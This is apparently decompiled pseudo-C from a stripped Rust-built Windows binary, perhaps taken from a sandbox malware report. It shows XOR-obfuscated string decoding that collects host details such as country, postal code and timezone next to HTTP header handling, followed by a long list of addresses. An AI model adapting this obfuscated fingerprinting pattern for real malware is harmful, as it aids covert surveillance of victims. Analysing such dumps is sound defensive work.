				memcpy(_t580 + 0x16, _t580, 0xb);
				 *((long long*)(_t954 + 0x308)) = _t941;
				asm("movaps xmm0, [ebp+0x2530]");
				asm("movdqa xmm1, [ebp+0x2540]");
				asm("movdqa xmm2, [ebp+0x2550]");
				asm("inc ecx");
				asm("repe inc ecx");
				asm("repe inc ecx");
				_t950 = _t954 + 0x340;
				 *((char*)(_t954 + 0x340)) = 0;
				 *((intOrPtr*)(_t954 + 0x341)) =  *((intOrPtr*)(_t911 + 0x2100));
				 *((intOrPtr*)(_t954 + 0x344)) =  *((intOrPtr*)(_t911 + 0x2103));
				_t884 =  *((intOrPtr*)(_t911 + 0x2568));
				r8d = 0x98;
				memcpy(??, ??, ??);
				r8d = 0x1e0;
				memcpy(??, ??, ??);
				r8d = 0x1e0;
				memcpy(??, ??, ??);
				 *((char*)(_t954 + 0x2a0)) = 0;
				_t87 = _t911 + 0xd60; // 0xd63
				E00007FF77FF768B7EB04();
				if ( *_t87 == 0) goto 0x68b9eab0;
				 *_t950 = 3;
				sil = 1;
				goto 0x68babc12;
				_t934 =  *((intOrPtr*)(_t911 + 0xd68));
				asm("movups xmm0, [ebp+0xd70]");
				asm("movaps [ebp+0x1e60], xmm0");
				_t942 =  *((intOrPtr*)(_t911 + 0xd80));
				 *((long long*)(_t911 + 0x2740)) = _t954 + 0xc0;
				_t442 = E00007FF77FF768B79BDD(_t954 + 0xc0);
				if (_t942 == 0) goto 0x68b9eb7b;
				asm("movaps xmm0, [ebp+0x1e60]");
				 *((intOrPtr*)(_t911 + 0x1e60)) =  *((intOrPtr*)(_t911 + 0x1e60)) - _t442;
				asm("movups [ebp+0x2578], xmm0");
				 *((long long*)(_t911 + 0x2570)) = _t934;
				 *((long long*)(_t911 + 0x2588)) = _t942;
				_t656 =  *((intOrPtr*)(_t911 + 0x2578));
				_t831 = _t911 + 0xd60;
				 *_t831 = _t934;
				 *((long long*)(_t911 + 0x2780)) = _t656;
				 *((long long*)(_t831 + 8)) = _t656;
				asm("xorps xmm0, xmm0");
				asm("movups [edx+0x10], xmm0");
				 *((long long*)(_t831 + 0x20)) = 1;
				 *((long long*)(_t831 + 0x28)) = 0;
				 *((char*)(_t831 + 0x30)) = 0x80;
				_t905 = _t911 + 0x22a0;
				E00007FF77FF768B72BF9(_t905, _t831, _t931);
				if ( *_t905 != 6) goto 0x68b9ebac;
				if ( *((long long*)(_t911 + 0xd78)) == 0) goto 0x68b9ec7c;
				HeapFree(??, ??, ??);
				goto 0x68b9ec7c;
				 *((intOrPtr*)(_t911 + 0x2690)) =  *((intOrPtr*)(_t911 + 0x1ab0));
				 *((intOrPtr*)(_t911 + 0x2693)) =  *((intOrPtr*)(_t911 + 0x1ab3));
				asm("movaps xmm0, [ebp+0x2110]");
				asm("movaps [ebp+0x1d50], xmm0");
				 *_t950 = 1;
				goto 0x68b9ed45;
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movdqu xmm1, [ebp+0x22b0]");
				asm("movdqa [ebp+0x1e70], xmm1");
				asm("movaps [ebp+0x1e60], xmm0");
				_t657 =  *((intOrPtr*)(_t911 + 0xd68));
				_t764 =  *((intOrPtr*)(_t911 + 0xd70));
				if (_t764 - _t657 >= 0) goto 0x68b9ec24;
				_t658 =  ~_t657;
				_t765 = _t764 + 1;
				_t607 = _t884 - 0x20;
				if (_t607 > 0) goto 0x68babc55;
				asm("dec eax");
				if (_t607 >= 0) goto 0x68babc55;
				 *((long long*)(_t911 + 0xd70)) = _t765;
				if (_t658 + _t765 + 1 != 1) goto 0x68b9ebf4;
				 *((intOrPtr*)(_t911 + 0x1bd0)) =  *((intOrPtr*)(_t911 + 0x1e61));
				 *((intOrPtr*)(_t911 + 0x1bd3)) =  *((intOrPtr*)(_t911 + 0x1e64));
				asm("movaps xmm0, [ebp+0x1e70]");
				asm("movaps [ebp+0x22a0], xmm0");
				if ( *((long long*)(_t911 + 0xd78)) == 0) goto 0x68b9ec77;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t911 + 0x1e60)) != 6) goto 0x68b9ecd4;
				E00007FF77FF768BAD0E0();
				if (_t658 == 0) goto 0x68bac532;
				 *_t658 =  *((intOrPtr*)(_t911 + 0x1e68));
				E00007FF77FF768BAD0E0();
				if (_t658 == 0) goto 0x68bac5c7;
				_t908 = _t658;
				 *_t658 = _t658;
				 *((long long*)(_t908 + 8)) = 0x68e29ae8;
				 *((intOrPtr*)(_t908 + 0x28)) = 2;
				 *((short*)(_t908 + 0x68)) = 5;
				goto 0x68b9ecfa;
				 *((intOrPtr*)(_t911 + 0x1ab3)) =  *((intOrPtr*)(_t911 + 0x1bd3));
				 *((intOrPtr*)(_t911 + 0x1ab0)) =  *((intOrPtr*)(_t911 + 0x1bd0));
				asm("movaps xmm0, [ebp+0x22a0]");
				asm("movaps [ebp+0x2110], xmm0");
				 *((intOrPtr*)(_t942 + 0x10))();
				 *((intOrPtr*)(_t911 + 0x2690)) =  *((intOrPtr*)(_t911 + 0x1ab0));
				 *((intOrPtr*)(_t911 + 0x2693)) =  *((intOrPtr*)(_t911 + 0x1ab3));
				asm("movaps xmm0, [ebp+0x2110]");
				asm("movaps [ebp+0x1d50], xmm0");
				 *_t950 = 1;
				if (6 == 7) goto 0x68b9ea9f;
				 *((intOrPtr*)(_t911 + 0x210b)) =  *((intOrPtr*)(_t911 + 0x2693));
				 *((intOrPtr*)(_t911 + 0x2108)) =  *((intOrPtr*)(_t911 + 0x2690));
				asm("movaps xmm0, [ebp+0x1d50]");
				asm("movaps [ebp-0x10], xmm0");
				E00007FF77FF768B77B28( *((intOrPtr*)(_t911 + 0x2740)));
				if (6 == 6) goto 0x68bac2a6;
				_t909 =  *((intOrPtr*)(_t911 + 0x2778));
				 *_t909 = 6;
				 *((intOrPtr*)(_t909 + 1)) =  *((intOrPtr*)(_t911 + 0x2108));
				 *((intOrPtr*)(_t909 + 4)) =  *((intOrPtr*)(_t911 + 0x210b));
				 *(_t909 + 8) = _t908;
				asm("movaps xmm0, [ebp-0x10]");
				asm("movups [esi+0x10], xmm0");
				 *((long long*)(_t909 + 0x58)) = 0x68e29ae8;
				 *((long long*)(_t909 + 0x60)) = 8;
				 *(_t909 + 0x68) = 0x68e29ae8;
				_t888 = _t911 + 0x10;
				r8d = 8;
				_t456 = E00007FF77FF768C622D0(_t888);
				if ( *((char*)(_t888 + 0x18)) != 3) goto 0x68bac2bc;
				 *((long long*)(_t909 + 0x80)) =  *((intOrPtr*)(_t911 + 0x20));
				asm("movups xmm0, [ebp+0x10]");
				asm("movups [esi+0x70], xmm0");
				 *(_t911 + 0xd60) = 0x68dc4d3b;
				 *(_t911 + 0xd60) = 0xd3eee650;
				_t835 =  *(_t911 + 0xd60);
				E00007FF77FF768B7D08B(_t456, 8,  *(_t911 + 0xd60), _t835);
				r14d =  *0x930E9B7CD3EEE65C & 0x0000ffff;
				r14d = r14d ^ 0x00002894;
				dil = dil ^ 0x00000002;
				E00007FF77FF768BEFD87(0xd3eee650,  *(_t911 + 0xd60));
				 *_t835 = 0x24e4b4e8 ^  *0xd3eee650;
				_t835[1] = 0x82737ce3 ^  *0x930E9B7CD3EEE658;
				_t835[1] = r14w;
				_t835[1] = dil;
				 *((long long*)(_t911 + 0x2770)) = _t909 + 0x58;
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9ee87;
				_t459 = E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)), _t909 + 0x58,  *(_t909 + 0x68),  *((intOrPtr*)(_t911 + 0x2780)));
				_t663 =  *((intOrPtr*)(_t909 + 0x60));
				_t773 =  *(_t909 + 0x68) +  *(_t909 + 0x68) * 2;
				 *((long long*)(_t663 + _t773 * 8)) = 0xd3eee650;
				 *(_t663 + 8 + _t773 * 8) = _t835;
				 *((long long*)(_t663 + 0x10 + _t773 * 8)) = 0xf;
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68db8e71;
				 *(_t911 + 0xd60) = 0x1339b7e0;
				E00007FF77FF768B7C989(_t459, 8,  *(_t911 + 0xd60),  *(_t911 + 0xd60));
				_t191 = _t911 + 0x2110; // -196936464789613064
				_t775 = _t191;
				 *_t775 =  *0x1339b7e0 & 0x0000ffff ^ 0x0000140c;
				 *((long long*)(_t911 + 0x2570)) = _t775;
				 *((long long*)(_t911 + 0x2578)) = 2;
				E00007FF77FF768C5897D(0x68dc5648,  *(_t911 + 0xd60), _t909);
				_t666 =  ==  ? 0x68e2a988 : 0x1339b7e0;
				if ( *_t666 != 3) goto 0x68bac2e2;
				_t777 =  *((intOrPtr*)(_t666 + 0x10));
				if (_t777 == 0) goto 0x68bac2e2;
				_t196 = _t911 + 0x1e60; // -196936464789613752
				_t951 = _t196;
				 *_t951 = _t777;
				 *((long long*)(_t951 + 8)) =  *((intOrPtr*)(_t666 + 0x18));
				_t198 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t198;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t203 = _t911 + 0xd60; // -196936464789618104
				_t889 = _t203;
				 *_t889 = 0;
				 *((long long*)(_t889 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t889 + 0x18)) = 0x68e2d3e8;
				_t206 = _t911 + 0x10; // -196936464789621512
				_t938 = _t206;
				 *((long long*)(_t889 + 0x20)) = _t938;
				 *((long long*)(_t889 + 0x28)) = 0x68e2d3e8;
				_t209 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t209, _t889);
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9efc4;
				_t466 = E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t909 + 0x68), _t909);
				 *((long long*)( *((intOrPtr*)(_t909 + 0x60)) + 0x10 + ( *(_t909 + 0x68) +  *(_t909 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68dc038e;
				 *(_t911 + 0xd60) = 0x4335469f;
				E00007FF77FF768B7CA0A(_t466, 2,  *(_t911 + 0xd60),  *(_t911 + 0xd60));
				 *((char*)(_t911 + 0x2116)) = ( *0x763290B3433546A5 & 0x000000ff ^ 0x00000087) & 0x000000ff;
				 *(_t911 + 0x2110) = 0xc2514704;
				 *((short*)(_t911 + 0x2114)) =  *0x763290B3433546A3 & 0x0000ffff ^ 0x0000f9dc;
				_t232 = _t911 + 0x2110; // -196936464789613064
				_t677 = _t232;
				 *((long long*)(_t911 + 0x2570)) = _t677;
				 *((long long*)(_t911 + 0x2578)) = 7;
				E00007FF77FF768C5897D("country",  *(_t911 + 0xd60) << 0x00000030 ^  *(_t911 + 0xd60), _t909);
				_t678 =  ==  ? 0x68e2a988 : _t677;
				if ( *_t678 != 3) goto 0x68bac2f5;
				_t783 =  *((intOrPtr*)(_t678 + 0x10));
				if (_t783 == 0) goto 0x68bac2f5;
				 *((long long*)(_t911 + 0x1e60)) = _t783;
				 *((long long*)(_t911 + 0x1e68)) =  *((intOrPtr*)(_t678 + 0x18));
				_t239 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t239;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t244 = _t911 + 0xd60; // -196936464789618104
				_t890 = _t244;
				 *_t890 = 0;
				 *((long long*)(_t890 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t890 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t890 + 0x20)) = _t938;
				 *((long long*)(_t890 + 0x28)) = 0x68e2d3e8;
				_t249 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t249, _t890);
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9f121;
				_t473 = E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t909 + 0x68), _t909);
				 *((long long*)( *((intOrPtr*)(_t909 + 0x60)) + 0x10 + ( *(_t909 + 0x68) +  *(_t909 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68dc2f44;
				 *(_t911 + 0xd60) = 0xc57550b9;
				E00007FF77FF768B7DC84(_t473, 7,  *(_t911 + 0xd60),  *(_t911 + 0xd60));
				 *(_t911 + 0x2110) = 0x1ff347fa ^  *0xc57550b9;
				_t267 = _t911 + 0x2110; // -196936464789613064
				_t686 = _t267;
				 *((long long*)(_t911 + 0x2570)) = _t686;
				 *((long long*)(_t911 + 0x2578)) = 4;
				E00007FF77FF768C5897D(0x68dc5688,  *(_t911 + 0xd60), _t909);
				_t687 =  ==  ? 0x68e2a988 : _t686;
				if ( *_t687 != 3) goto 0x68bac308;
				_t789 =  *((intOrPtr*)(_t687 + 0x10));
				if (_t789 == 0) goto 0x68bac308;
				 *((long long*)(_t911 + 0x1e60)) = _t789;
				 *((long long*)(_t911 + 0x1e68)) =  *((intOrPtr*)(_t687 + 0x18));
				_t274 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t274;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t279 = _t911 + 0xd60; // -196936464789618104
				_t891 = _t279;
				 *_t891 = 0;
				 *((long long*)(_t891 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t891 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t891 + 0x20)) = _t938;
				 *((long long*)(_t891 + 0x28)) = 0x68e2d3e8;
				_t284 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t284, _t891);
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9f24c;
				E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t909 + 0x68), _t909);
				 *((long long*)( *((intOrPtr*)(_t909 + 0x60)) + 0x10 + ( *(_t909 + 0x68) +  *(_t909 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68dbfd42;
				 *(_t911 + 0xd60) = 0x2e35226d;
				E00007FF77FF768B7DBF1( *(_t911 + 0xd60));
				 *(_t911 + 0x2110) = 0xac8f6d92;
				 *((short*)(_t911 + 0x2114)) =  *0x3BF7FA642E352271 & 0x0000ffff ^ 0x0000ac8c;
				_t304 = _t911 + 0x2110; // -196936464789613064
				_t695 = _t304;
				 *((long long*)(_t911 + 0x2570)) = _t695;
				 *((long long*)(_t911 + 0x2578)) = 6;
				E00007FF77FF768C5897D("postal",  *(_t911 + 0xd60) ^  *(_t911 + 0xd60), _t909);
				_t696 =  ==  ? 0x68e2a988 : _t695;
				if ( *_t696 != 3) goto 0x68bac31b;
				_t795 =  *((intOrPtr*)(_t696 + 0x10));
				if (_t795 == 0) goto 0x68bac31b;
				 *((long long*)(_t911 + 0x1e60)) = _t795;
				 *((long long*)(_t911 + 0x1e68)) =  *((intOrPtr*)(_t696 + 0x18));
				_t311 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t311;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t316 = _t911 + 0xd60; // -196936464789618104
				_t892 = _t316;
				 *_t892 = 0;
				 *((long long*)(_t892 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t892 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t892 + 0x20)) = _t938;
				 *((long long*)(_t892 + 0x28)) = 0x68e2d3e8;
				_t321 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t321, _t892);
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9f38a;
				_t484 = E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t909 + 0x68), _t909);
				 *((long long*)( *((intOrPtr*)(_t909 + 0x60)) + 0x10 + ( *(_t909 + 0x68) +  *(_t909 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) =  &M00007FF77FF768DC12AE;
				 *(_t911 + 0xd60) = 0x3b4f06ba;
				E00007FF77FF768B7BF02(_t484, 6,  *(_t911 + 0xd60),  *(_t911 + 0xd60));
				_t540 =  *0x176F8B173B4F06BC & 0x000000ff ^ 0x0000009c;
				_t339 = _t911 + 0x1d50; // -196936464789614024
				_t863 = _t339;
				 *(_t863 + 2) = _t540;
				 *_t863 =  *0x3b4f06ba & 0x0000ffff ^ 0x0000a403;
				 *((long long*)(_t911 + 0x2570)) = _t863;
				 *((long long*)(_t911 + 0x2578)) = 3;
				E00007FF77FF768C5897D("connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-allow-headersaccess-control-allow-credentialsaccept-rangesaccept-languageaccept-encodingaccept-charsetacceptC:\\Users\\user\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823\\http-0.2.9\\src\\header\\value.rs", _t863, _t909);
				_t704 =  ==  ? 0x68e2a988 : 0x3b4f06ba;
				E00007FF77FF768C5897D(0x68dc5700, _t863, _t704);
				_t705 =  ==  ? 0x68e2a988 : _t704;
				if ( *_t705 != 3) goto 0x68bac32e;
				_t802 =  *((intOrPtr*)(_t705 + 0x10));
				if (_t802 == 0) goto 0x68bac32e;
				_t706 =  *((intOrPtr*)(_t705 + 0x18));
				 *((long long*)(_t911 + 0x1e60)) = _t802;
				 *((long long*)(_t911 + 0x1e68)) = _t706;
				E00007FF77FF768C5897D("connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-allow-headersaccess-control-allow-credentialsaccept-rangesaccept-languageaccept-encodingaccept-charsetacceptC:\\Users\\user\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823\\http-0.2.9\\src\\header\\value.rs", _t863, _t909);
				_t707 =  ==  ? 0x68e2a988 : _t706;
				E00007FF77FF768C5897D(0x68dc5720, _t863, _t707);
				_t708 =  ==  ? 0x68e2a988 : _t707;
				if ( *_t708 != 2) goto 0x68bac1d1;
				if ( *((intOrPtr*)(_t708 + 8)) == 0) goto 0x68b9f4c2;
				if (_t540 != 1) goto 0x68bac1d1;
				goto 0x68b9f4cf;
				_t710 =  *((intOrPtr*)( *((intOrPtr*)(_t708 + 0x10)) + 0x10));
				if (_t710 < 0) goto 0x68bac1d1;
				 *(_t911 + 0x2110) = _t710;
				_t351 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t351;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t356 = _t911 + 0x2110; // -196936464789613064
				 *((long long*)(_t911 + 0x30)) = _t356;
				 *((long long*)(_t911 + 0x38)) = E00007FF77FF768BC2E10;
				_t359 = _t911 + 0xd60; // -196936464789618104
				_t893 = _t359;
				 *_t893 = 0;
				 *((long long*)(_t893 + 0x10)) = 0x68dc56d0;
				 *((long long*)(_t893 + 0x18)) = 0x68dc56d0;
				 *((long long*)(_t893 + 0x20)) = _t938;
				 *((long long*)(_t893 + 0x28)) = 0x68dc56d0;
				_t364 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t364, _t893);
				if ( *(_t909 + 0x68) !=  *((intOrPtr*)(_t909 + 0x58))) goto 0x68b9f559;
				E00007FF77FF768C51B93( *(_t909 + 0x68) -  *((intOrPtr*)(_t909 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t909 + 0x68), _t707);
				 *((long long*)( *((intOrPtr*)(_t909 + 0x60)) + 0x10 + ( *(_t909 + 0x68) +  *(_t909 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t909 + 0x68) =  *(_t909 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68dbef95;
				 *(_t911 + 0xd60) = 0x40291583;
				0x68b7c721();
				 *(_t911 + 0x2110) = 0x0bb9d9bc ^  *0x40291583;
				_t382 = _t911 + 0x2110; // -196936464789613064
				_t719 = _t382;
				 *((long long*)(_t911 + 0x2570)) = _t719;
				 *((long long*)(_t911 + 0x2578)) = 8;
				E00007FF77FF768C5897D("timezoneutc",  *(_t911 + 0xd60), _t909);
				_t720 =  ==  ? 0x68e2a988 : _t719;
				E00007FF77FF768C5897D(0x68dc5748,  *(_t911 + 0xd60), _t720);
				_t721 =  ==  ? 0x68e2a988 : _t720;
				if ( *_t721 != 3) goto 0x68bac341;
				_t814 =  *((intOrPtr*)(_t721 + 0x10));
				if (_t814 == 0) goto 0x68bac341;
				 *((long long*)(_t911 + 0x1e60)) = _t814;
				 *((long long*)(_t911 + 0x1e68)) =  *((intOrPtr*)(_t721 + 0x18));
				_t389 = _t911 + 0x2570; // -196936464789611944
				 *((long long*)(_t911 + 0x10)) = _t389;
				 *((long long*)(_t911 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t911 + 0x20)) = _t951;
				 *((long long*)(_t911 + 0x28)) = 0x68befcb0;
				_t394 = _t911 + 0xd60; // -196936464789618104
				_t910 = _t394;
				 *_t910 = 0;
				 *((long long*)(_t910 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t910 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t910 + 0x20)) = _t938;
				 *((long long*)(_t910 + 0x28)) = 0x68e2d3e8;
				_t399 = _t911 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t399, _t910);
				_t959 =  *((intOrPtr*)(_t911 + 0x2778));
				if ( *(_t959 + 0x68) !=  *((intOrPtr*)(_t959 + 0x58))) goto 0x68b9f6b1;
				_t499 = E00007FF77FF768C51B93( *(_t959 + 0x68) -  *((intOrPtr*)(_t959 + 0x58)),  *((intOrPtr*)(_t911 + 0x2770)),  *(_t959 + 0x68), _t720);
				 *((long long*)( *((intOrPtr*)(_t959 + 0x60)) + 0x10 + ( *(_t959 + 0x68) +  *(_t959 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t911 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t959 + 0x68) =  *(_t959 + 0x68) + 1;
				 *(_t911 + 0xd60) = 0x68dbd6a0;
				 *(_t911 + 0xd60) = 0x11e5e200;
				E00007FF77FF768B7BF47(_t499, 3,  *(_t911 + 0xd60),  *(_t911 + 0xd60));
			}


















































































                                                                                          0x7ff768b9e54e
                                                                                          0x7ff768b9e54e
                                                                                          0x7ff768b9e54e
                                                                                          0x7ff768b9e55c
                                                                                          0x7ff768b9e566
                                                                                          0x7ff768b9e56d
                                                                                          0x7ff768b9e576
                                                                                          0x7ff768b9e58a
                                                                                          0x7ff768b9e59d
                                                                                          0x7ff768b9e5a7
                                                                                          0x7ff768b9e5ae
                                                                                          0x7ff768b9e5b7
                                                                                          0x7ff768b9e5bd
                                                                                          0x7ff768b9e5c4
                                                                                          0x7ff768b9e5ce
                                                                                          0x7ff768b9e5d5
                                                                                          0x7ff768b9e5de
                                                                                          0x7ff768b9e5e4
                                                                                          0x7ff768b9e5eb
                                                                                          0x7ff768b9e5fe
                                                                                          0x7ff768b9e608
                                                                                          0x7ff768b9e611
                                                                                          0x7ff768b9e625
                                                                                          0x7ff768b9e642
                                                                                          0x7ff768b9e64a
                                                                                          0x7ff768b9e652
                                                                                          0x7ff768b9e659
                                                                                          0x7ff768b9e663
                                                                                          0x7ff768b9e665
                                                                                          0x7ff768b9e66b
                                                                                          0x7ff768b9e670
                                                                                          0x7ff768b9e677
                                                                                          0x7ff768b9e681
                                                                                          0x7ff768b9e687
                                                                                          0x7ff768b9e68c
                                                                                          0x7ff768b9e690
                                                                                          0x7ff768b9e697
                                                                                          0x7ff768b9e69e
                                                                                          0x7ff768b9e6a0
                                                                                          0x7ff768b9e6a3
                                                                                          0x7ff768b9e6ba
                                                                                          0x7ff768b9e6bd
                                                                                          0x7ff768b9e6c4
                                                                                          0x7ff768b9e6cb
                                                                                          0x7ff768b9e6d9
                                                                                          0x7ff768b9e6dd
                                                                                          0x7ff768b9e6e3
                                                                                          0x7ff768b9e6ea
                                                                                          0x7ff768b9e6f1
                                                                                          0x7ff768b9e6f8
                                                                                          0x7ff768b9e701
                                                                                          0x7ff768b9e705
                                                                                          0x7ff768b9e70c
                                                                                          0x7ff768b9e710
                                                                                          0x7ff768b9e714
                                                                                          0x7ff768b9e71b
                                                                                          0x7ff768b9e71f
                                                                                          0x7ff768b9e726
                                                                                          0x7ff768b9e72a
                                                                                          0x7ff768b9e738
                                                                                          0x7ff768b9e73c
                                                                                          0x7ff768b9e740
                                                                                          0x7ff768b9e747
                                                                                          0x7ff768b9e74d
                                                                                          0x7ff768b9e750
                                                                                          0x7ff768b9e753
                                                                                          0x7ff768b9e757
                                                                                          0x7ff768b9e76a
                                                                                          0x7ff768b9e76a
                                                                                          0x7ff768b9e76d
                                                                                          0x7ff768b9e771
                                                                                          0x7ff768b9e778
                                                                                          0x7ff768b9e780
                                                                                          0x7ff768b9e784
                                                                                          0x7ff768b9e789
                                                                                          0x7ff768b9e7a4
                                                                                          0x7ff768b9e7c4
                                                                                          0x7ff768b9e7c9
                                                                                          0x7ff768b9e7d5
                                                                                          0x7ff768b9e7f8
                                                                                          0x7ff768b9e7fd
                                                                                          0x7ff768b9e801
                                                                                          0x7ff768b9e805
                                                                                          0x7ff768b9e807
                                                                                          0x7ff768b9e80c
                                                                                          0x7ff768b9e811
                                                                                          0x7ff768b9e830
                                                                                          0x7ff768b9e830
                                                                                          0x7ff768b9e833
                                                                                          0x7ff768b9e837
                                                                                          0x7ff768b9e83b
                                                                                          0x7ff768b9e842
                                                                                          0x7ff768b9e849
                                                                                          0x7ff768b9e850
                                                                                          0x7ff768b9e85a
                                                                                          0x7ff768b9e866
                                                                                          0x7ff768b9e86a
                                                                                          0x7ff768b9e87a
                                                                                          0x7ff768b9e89c
                                                                                          0x7ff768b9e89f
                                                                                          0x7ff768b9e8a6
                                                                                          0x7ff768b9e8ad
                                                                                          0x7ff768b9e8b4
                                                                                          0x7ff768b9e8bb
                                                                                          0x7ff768b9e8c2
                                                                                          0x7ff768b9e8c9
                                                                                          0x7ff768b9e8dd
                                                                                          0x7ff768b9e8e0
                                                                                          0x7ff768b9e8e7
                                                                                          0x7ff768b9e8ee
                                                                                          0x7ff768b9e8f6
                                                                                          0x7ff768b9e8fe
                                                                                          0x7ff768b9e905
                                                                                          0x7ff768b9e90f
                                                                                          0x7ff768b9e918
                                                                                          0x7ff768b9e934
                                                                                          0x7ff768b9e937
                                                                                          0x7ff768b9e93e
                                                                                          0x7ff768b9e945
                                                                                          0x7ff768b9e94c
                                                                                          0x7ff768b9e953
                                                                                          0x7ff768b9e95a
                                                                                          0x7ff768b9e96c
                                                                                          0x7ff768b9e975
                                                                                          0x7ff768b9e986
                                                                                          0x7ff768b9e98c
                                                                                          0x7ff768b9e992
                                                                                          0x7ff768b9e99e
                                                                                          0x7ff768b9e9a3
                                                                                          0x7ff768b9e9b1
                                                                                          0x7ff768b9e9c7
                                                                                          0x7ff768b9e9ca
                                                                                          0x7ff768b9e9d1
                                                                                          0x7ff768b9e9d8
                                                                                          0x7ff768b9e9e0
                                                                                          0x7ff768b9e9e8
                                                                                          0x7ff768b9e9f0
                                                                                          0x7ff768b9e9f9
                                                                                          0x7ff768b9ea02
                                                                                          0x7ff768b9ea09
                                                                                          0x7ff768b9ea1d
                                                                                          0x7ff768b9ea24
                                                                                          0x7ff768b9ea2b
                                                                                          0x7ff768b9ea40
                                                                                          0x7ff768b9ea46
                                                                                          0x7ff768b9ea59
                                                                                          0x7ff768b9ea62
                                                                                          0x7ff768b9ea67
                                                                                          0x7ff768b9ea73
                                                                                          0x7ff768b9ea78
                                                                                          0x7ff768b9ea80
                                                                                          0x7ff768b9ea90
